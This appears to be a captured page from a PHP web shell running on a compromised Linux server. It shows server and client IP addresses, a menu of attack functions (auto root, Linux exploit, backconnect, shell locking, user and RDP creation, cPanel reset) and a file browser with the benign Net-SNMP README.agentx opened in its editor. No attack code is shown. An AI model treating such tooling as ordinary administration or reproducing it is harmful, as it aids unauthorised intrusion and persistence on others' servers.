Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.138.175.10
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
net-snmp-5.7.2 /
[ HOME SHELL ]
Name
Size
Permission
Action
AGENT.txt
55.4
KB
-rw-r--r--
COPYING
14.18
KB
-rw-r--r--
ChangeLog.trimmed
250
KB
-rw-r--r--
EXAMPLE.conf
6.83
KB
-rw-r--r--
FAQ
167.75
KB
-rw-r--r--
NEWS
65.65
KB
-rw-r--r--
PORTING
3.48
KB
-rw-r--r--
README
13.33
KB
-rw-r--r--
README.agent-mibs
20.24
KB
-rw-r--r--
README.agentx
2.03
KB
-rw-r--r--
README.krb5
6.17
KB
-rw-r--r--
README.mib2c
7.45
KB
-rw-r--r--
README.snmpv3
3.98
KB
-rw-r--r--
README.thread
13.47
KB
-rw-r--r--
TODO
1.35
KB
-rw-r--r--
ipf-mod.pl
6.53
KB
-rw-r--r--
passtest
2.37
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.agentx
Net-SNMP contains a reasonably full implementation of the AgentX agent extensibility protocol (RFC 2741) in as much as it supports all the protocol operations described in this document. The core functionality has received a reasonable amount of exposure, and is believed to be more or less stable in normal use. It will also handle the non-graceful termination of subagents - returning a 'genErr' error for three successive requests before unregistering the unresponsive subagent. A subagent will attempts to re-establish contact with a dead and resurrected master based on the agentxPingInterval setting. The default for this configuration variable is 15 seconds. It can be changed by putting the following line in your APPLICATION.conf file: agentxPingInterval 60 will make the subagent try to ping the master every 60 seconds, and if the connection is deemed broken it'll try and reconnect to the master agent after that point (once every 60 seconds). Similarly, a subagent will not be able to re-register in place of a defunct colleague until the master agent has received three requests for the dead connection (and hence unregistered it). Some of the less frequently used features (index allocation, range registration, etc), have received less thorough testing, and may well not be fully functional. Some of the omissions of the earlier release (use of GetBulk, the AgentX MIB) are still missing from this version. AgentX support is now included in the agent by default, but needs to be explicitly enabled before use. Activate it using by putting a line master agentx in the snmpd.conf file. This support is also enabled automatically when the '-x' flag is given (to specify a different master AgentX socket), or when the agent is invoked as an AgentX subagent (i.e. via the name 'agentxd' or with the '-X' flag). See the main project web page for an examples of a simple stand-alone subagent. (http://www.net-snmp.org/tutorial/tutorial-5/toolkit/) Please report any problems experienced to the net-snmp-coders list. Dave
Close